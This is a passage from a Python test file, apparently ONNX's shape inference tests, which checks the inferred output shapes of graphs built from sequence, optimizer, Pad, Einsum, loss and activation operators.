make_tensor_value_info('output', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_at_unknown_shape(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceAt', ['in_sequence', 'ind'], ['output'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, None),
make_tensor_value_info('output', TensorProto.FLOAT, None)]) # type: ignore
def test_sequence_at_unknown_dim_size(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 5)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceAt', ['in_sequence', 'ind'], ['output'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, None)), # type: ignore
make_tensor_value_info('output', TensorProto.FLOAT, (2, 3, None))]) # type: ignore
def test_sequence_erase(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceErase', ['in_sequence', 'ind'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 4)),
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_erase_diff_dim_size(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 5, 'x')),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceErase', ['in_sequence', 'ind'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 'x')), # type: ignore
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, None, 'x'))]) # type: ignore
def test_sequence_length(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceLength', ['in_sequence'], ['len'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 'x')),
make_tensor_value_info('len', TensorProto.INT64, ())]) # type: ignore
def test_split_to_sequence(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, (2,))],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'])],
[],
initializer=[make_tensor('split', TensorProto.INT32, (2,), (3, 3))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (3, 4))]) # type: ignore
def test_split_to_sequence_scalar(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, ())],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'])],
[],
initializer=[make_tensor('split', TensorProto.INT32, (), (2, ))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 4))]) # type: ignore
def test_split_to_sequence_keepdims(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4))],
[make_node('SplitToSequence', ['input'], ['output_sequence'], keepdims=1)],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (1, 4))]) # type: ignore
def test_split_to_sequence_not_keepdims(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4))],
[make_node('SplitToSequence', ['input'], ['output_sequence'], keepdims=0)],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (4, ))]) # type: ignore
def test_split_to_sequence_ignore_keepdims(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, (2,))],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'], keepdims=0)],
[],
initializer=[make_tensor('split', TensorProto.INT32, (2,), (3, 3))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (3, 4))]) # type: ignore
def test_split_to_sequence_axis(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4))],
[make_node('SplitToSequence', ['input'], ['output_sequence'], axis=1)],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (6, 1))]) # type: ignore
def test_split_to_sequence_neg_axis(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4))],
[make_node('SplitToSequence', ['input'], ['output_sequence'], axis=-2)],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (1, 4))]) # type: ignore
def test_split_to_sequence_split_sizes(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, (3,))],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'])],
[],
initializer=[make_tensor('split', TensorProto.INT32, (3,), (2, 1, 3))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (None, 4))]) # type: ignore
def test_split_to_sequence_non_divisible(self): # type: () -> None
graph = self._make_graph(
[('input', TensorProto.FLOAT, (6, 4)),
('split', TensorProto.INT32, ())],
[make_node('SplitToSequence', ['input', 'split'], ['output_sequence'])],
[],
initializer=[make_tensor('split', TensorProto.INT32, (), (4, ))])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (None, 4))]) # type: ignore
def test_concat_from_sequence(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=0)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 'x')),
make_tensor_value_info('out', TensorProto.FLOAT, (None, 3, 'x'))]) # type: ignore
def test_concat_from_sequence_unknown_shape(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3)),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=0)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, None),
make_tensor_value_info('out', TensorProto.FLOAT, None)]) # type: ignore
def test_concat_from_sequence_unknown_dim_size(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 4, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=0)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 'x')), # type: ignore
make_tensor_value_info('out', TensorProto.FLOAT, (None, None, 'x'))]) # type: ignore
def test_concat_from_sequence_axis(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 4, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=2)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 'x')), # type: ignore
make_tensor_value_info('out', TensorProto.FLOAT, (2, None, None))]) # type: ignore
def test_concat_from_sequence_neg_axis(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 4, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=-3)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 'x')), # type: ignore
make_tensor_value_info('out', TensorProto.FLOAT, (None, None, 'x'))]) # type: ignore
def test_concat_from_sequence_new_axis(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=2, new_axis=1)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 'x')),
make_tensor_value_info('out', TensorProto.FLOAT, (2, 3, None, 'x'))]) # type: ignore
def test_concat_from_sequence_neg_new_axis(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 'x')),
('input2', TensorProto.FLOAT, (2, 3, 'x')),
('input3', TensorProto.FLOAT, (2, 3, 'x'))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('ConcatFromSequence', ['in_sequence'], ['out'], axis=-1, new_axis=1)],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 'x')),
make_tensor_value_info('out', TensorProto.FLOAT, (2, 3, 'x', None))]) # type: ignore
def test_adagrad(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X', TensorProto.FLOAT, (1, 2)),
('G', TensorProto.FLOAT, (1, 2)),
('H', TensorProto.FLOAT, (1, 2))],
[make_node('Adagrad', ['R', 'T', 'X', 'G', 'H'], ['X_new', 'H_new'],
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN)],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('X_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('H_new', TensorProto.FLOAT, (1, 2))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 12), helper.make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1)])
def test_adagrad_multiple(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X1', TensorProto.FLOAT, (1, 2)),
('X2', TensorProto.FLOAT, (3, 4)),
('G1', TensorProto.FLOAT, (1, 2)),
('G2', TensorProto.FLOAT, (3, 4)),
('H1', TensorProto.FLOAT, (1, 2)),
('H2', TensorProto.FLOAT, (3, 4))],
[make_node('Adagrad', ['R', 'T', 'X1', 'X2', 'G1', 'G2', 'H1', 'H2'],
['X1_new', 'X2_new', 'H1_new', 'H2_new'],
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN)],
[])
self._assert_inferred(graph,
[make_tensor_value_info('X1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('X2_new', TensorProto.FLOAT, (3, 4)),
make_tensor_value_info('H1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('H2_new', TensorProto.FLOAT, (3, 4))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 12), helper.make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1)])
def test_momentum(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X', TensorProto.FLOAT, (1, 2)),
('G', TensorProto.FLOAT, (1, 2)),
('V', TensorProto.FLOAT, (1, 2))],
[make_node('Momentum', ['R', 'T', 'X', 'G', 'V'], ['X_new', 'V_new'],
alpha=0.9, beta=1.0, norm_coefficient=0.02, mode='standard',
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN)],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('X_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('V_new', TensorProto.FLOAT, (1, 2))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 12), helper.make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1)])
def test_momentum_multiple(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X1', TensorProto.FLOAT, (1, 2)),
('X2', TensorProto.FLOAT, (3, 4)),
('G1', TensorProto.FLOAT, (1, 2)),
('G2', TensorProto.FLOAT, (3, 4)),
('V1', TensorProto.FLOAT, (1, 2)),
('V2', TensorProto.FLOAT, (3, 4))],
[make_node('Momentum', ['R', 'T', 'X1', 'X2', 'G1', 'G2', 'V1', 'V2'],
['X1_new', 'X2_new', 'V1_new', 'V2_new'],
alpha=0.9, beta=1.0, norm_coefficient=0.02, mode='nesterov',
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN)],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('X1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('X2_new', TensorProto.FLOAT, (3, 4)),
make_tensor_value_info('V1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('V2_new', TensorProto.FLOAT, (3, 4))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 12), helper.make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1)])
def test_adam(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X', TensorProto.FLOAT, (1, 2)),
('G', TensorProto.FLOAT, (1, 2)),
('V', TensorProto.FLOAT, (1, 2)),
('H', TensorProto.FLOAT, (1, 2))],
[make_node('Adam', ['R', 'T', 'X', 'G', 'V', 'H'], ['X_new', 'V_new', 'H_new'],
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN,
alpha=0.9, beta=1.0, norm_coefficient=0.02)],
[])
infos = [make_tensor_value_info('X_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('V_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('H_new', TensorProto.FLOAT, (1, 2))]
self._assert_inferred(
graph,
infos,
opset_imports=[make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1), make_opsetid(ONNX_DOMAIN, 12)])
def test_adam_multiple(self): # type: () -> None
graph = self._make_graph(
[('R', TensorProto.FLOAT, ()), # scalar's shape is ()
('T', TensorProto.INT64, ()), # scalar's shape is ()
('X1', TensorProto.FLOAT, (1, 2)),
('X2', TensorProto.FLOAT, (3, 4)),
('G1', TensorProto.FLOAT, (1, 2)),
('G2', TensorProto.FLOAT, (3, 4)),
('V1', TensorProto.FLOAT, (1, 2)),
('V2', TensorProto.FLOAT, (3, 4)),
('H1', TensorProto.FLOAT, (1, 2)),
('H2', TensorProto.FLOAT, (3, 4))],
[make_node('Adam', ['R', 'T', 'X1', 'X2', 'G1', 'G2', 'V1', 'V2', 'H1', 'H2'],
['X1_new', 'X2_new', 'V1_new', 'V2_new', 'H1_new', 'H2_new'],
domain=AI_ONNX_PREVIEW_TRAINING_DOMAIN,
alpha=0.9, beta=1.0, norm_coefficient=0.02)],
[])
infos = [make_tensor_value_info('X1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('X2_new', TensorProto.FLOAT, (3, 4)),
make_tensor_value_info('V1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('V2_new', TensorProto.FLOAT, (3, 4)),
make_tensor_value_info('H1_new', TensorProto.FLOAT, (1, 2)),
make_tensor_value_info('H2_new', TensorProto.FLOAT, (3, 4))]
self._assert_inferred(
graph,
infos,
opset_imports=[make_opsetid(AI_ONNX_PREVIEW_TRAINING_DOMAIN, 1), make_opsetid(ONNX_DOMAIN, 12)])
def test_pad_opset10(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, None, 2))],
[make_node('Pad', 'x', 'y', pads=[1, 3, 1, 1, 0, 1])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, None, 4))], opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 10)]) # type: ignore
def test_constant_pad_2d_opset10(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 4, 4))],
[make_node('Pad', 'x', 'y', pads=[0, 0, 3, 1, 0, 0, 4, 2], mode="constant", value=2.0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3, 11, 7))], opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 10)])
def test_pad(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, None, 2)),
('pads', TensorProto.INT64, (6,))],
[make_node('Pad', ['x', 'pads'], 'y')],
[],
initializer=[make_tensor('pads', TensorProto.INT64, (6,), (1, 3, 1, 1, 0, 1,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, None, 4))]) # type: ignore
def test_gatherelements_basic(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (6,)),
('indices', TensorProto.INT64, (2,))],
[make_node('GatherElements', ['x', 'indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2,))])
def test_gatherelements_indices_missing_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (6,)),
('indices', TensorProto.INT64, None)], # type: ignore
[make_node('GatherElements', ['x', 'indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, None)]) # type: ignore
def test_einsum_transpose(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4))],
[make_node('Einsum', ['x'], ['y'], equation='ij->ji')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (None, None))]) # type: ignore
def test_einsum_dot(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1,)),
('y', TensorProto.FLOAT, (1,))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='i,i->')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ())]) # type: ignore
def test_einsum_scalar(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ()),
('y', TensorProto.FLOAT, ())],
[make_node('Einsum', ['x', 'y'], ['z'], equation=',->')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ())]) # type: ignore
def test_einsum_outer_prod(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 5)),
('y', TensorProto.FLOAT, (7, 9))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='ij,ab->ijab')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None, None))]) # type: ignore
def test_einsum_sum_along_dim(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4))],
[make_node('Einsum', ['x'], ['y'], equation='i j->i ')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (None, ))]) # type: ignore
def test_einsum_ellipsis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 4))],
[make_node('Einsum', ['x'], ['y'], equation='... ii ->... i')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (None, None))]) # type: ignore
def test_einsum_ellipsis_2(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 2, 2)),
('y', TensorProto.FLOAT, (2, 2, 2))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='...ij,...jk->...ik')],
[], )
self._assert_inferred(graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None))]) # type: ignore
def test_einsum_ellipsis_3(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 2, 2)),
('y', TensorProto.FLOAT, (2, 2, 2))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='...ij,...jk')],
[], )
self._assert_inferred(graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None))]) # type: ignore
def test_einsum_contraction(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7, 8)),
('y', TensorProto.FLOAT, (8, 9, 10))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='abcd,dfg->abcfg')],
[], )
self._assert_inferred(graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None, None, None))]) # type: ignore
def test_einsum_contraction_2(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('y', TensorProto.FLOAT, (3, 5))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='ijk,ik->jk')],
[], )
self._assert_inferred(graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (None, None))]) # type: ignore
def test_einsum_batch_matmul(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 2, 3)),
('y', TensorProto.FLOAT, (5, 3, 4))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='bij , b jk-> bik')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None))]) # type: ignore
def test_einsum_left_hand_eqn(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3)),
('y', TensorProto.FLOAT, (3, 4))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='ij,kl')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (None, None, None, None))]) # type: ignore
def test_einsum_incorrect_num_inputs(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3)),
("y", TensorProto.FLOAT, (2, 3)),
("z", TensorProto.FLOAT, (2, 3))],
[make_node('Einsum', ['x', 'y'], ['z'], equation='i,...j, k, l-> i')],
[])
self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)
def test_negative_log_likehood_shape_is_NCdd(self): # type: () -> None
N, C = 3, 4
graph = self._make_graph(
[('input', TensorProto.FLOAT, (N, C)),
('target', TensorProto.INT64, (N,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target'], ['loss'], reduction='none')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, (N, ))]) # type: ignore
def test_negative_log_likehood_shape_is_NC_with_weight(self): # type: () -> None
N, C = 3, 4
graph = self._make_graph(
[('input', TensorProto.FLOAT, (N, C)),
('target', TensorProto.INT64, (N,)),
('weight', TensorProto.FLOAT, (C,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='none')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, (N, ))]) # type: ignore
def test_negative_log_likehood_shape_is_NC_reduction_mean(self): # type: () -> None
N, C = 3, 4
graph = self._make_graph(
[('input', TensorProto.FLOAT, (N, C)),
('target', TensorProto.INT64, (N,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target'], ['loss'], reduction='mean')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, ())]) # type: ignore
def test_negative_log_likehood_shape_is_NC_with_weight_reduction_mean(self): # type: () -> None
N, C = 3, 4
graph = self._make_graph(
[('input', TensorProto.FLOAT, (N, C)),
('target', TensorProto.INT64, (N,)),
('weight', TensorProto.FLOAT, (C,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='mean')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, ())]) # type: ignore
def test_negative_log_likehood_shape_is_NCd1d2(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target'], ['loss'], reduction='none')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, (N, d1, d2))]) # type: ignore
def test_negative_log_likehood_shape_is_NCd1d2_with_weight(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2)),
("weight", TensorProto.FLOAT, (C,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='none')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, (N, d1, d2))]) # type: ignore
def test_negative_log_likehood_shape_is_NCd1d2_reduction_sum(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target'], ['loss'], reduction='sum')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, ())]) # type: ignore
def test_negative_log_likehood_shape_is_NCd1d2_with_weight_reduction_mean(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2)),
("weight", TensorProto.FLOAT, (C,))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='mean')],
[])
self._assert_inferred(graph, [make_tensor_value_info('loss', TensorProto.FLOAT, ())]) # type: ignore
def test_negative_log_likehood_input_target_shape_mismatch(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, d1, d2)),
("target", TensorProto.INT64, (N, d1 + 1, d2)),
("weight", TensorProto.FLOAT, (C,)),
("loss", TensorProto.FLOAT, ())],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='mean')],
[])
self.assertRaises(onnx.shape_inference.InferenceError, self._inferred, graph)
def test_negative_log_likehood_input_weight_shape_mismatch(self): # type: () -> None
N, C, d1, d2 = 3, 4, 5, 6
graph = self._make_graph(
[("input", TensorProto.FLOAT, (N, C, d1, d2)),
("target", TensorProto.INT64, (N, d1, d2)),
("weight", TensorProto.FLOAT, (C + 1,)),
("loss", TensorProto.FLOAT, (N, d1, d2))],
[make_node('NegativeLogLikelihoodLoss', ['input', 'target', 'weight'], ['loss'], reduction='none')],
[])
self.assertRaises(checker.ValidationError, self._inferred, graph)
def test_softmax_cross_entropy_none(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3)),
("y", TensorProto.FLOAT, (2,))],
[make_node('SoftmaxCrossEntropyLoss', ['x', 'y'], ['z'], reduction='none')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2,))]) # type: ignore
def test_softmax_cross_entropy_mean(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3)),
("y", TensorProto.FLOAT, (2,))],
[make_node('SoftmaxCrossEntropyLoss', ['x', 'y'], ['z'], reduction='mean')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ())]) # type: ignore
def test_softmax_cross_entropy_none_NCD1D2(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3, 5, 8)),
("y", TensorProto.FLOAT, (2, 5, 8))],
[make_node('SoftmaxCrossEntropyLoss', ['x', 'y'], ['z'], reduction='none')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 5, 8))]) # type: ignore
def test_softmax_cross_entropy_mean_NCD1D2(self): # type: () -> None
graph = self._make_graph(
[("x", TensorProto.FLOAT, (2, 3, 4, 5)),
("y", TensorProto.FLOAT, (2, 4, 5))],
[make_node('SoftmaxCrossEntropyLoss', ['x', 'y'], ['z'], reduction='mean')],
[],)
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, ())]) # type: ignore
def test_celu_function_output_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16))],
[make_node('Celu', ['X'], ['Y'], alpha=2.0)],
[]
)
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 48, 16, 16))])
def prepare_input_initializer_tensors(self, initializer_shape, input_shape): # type: ignore
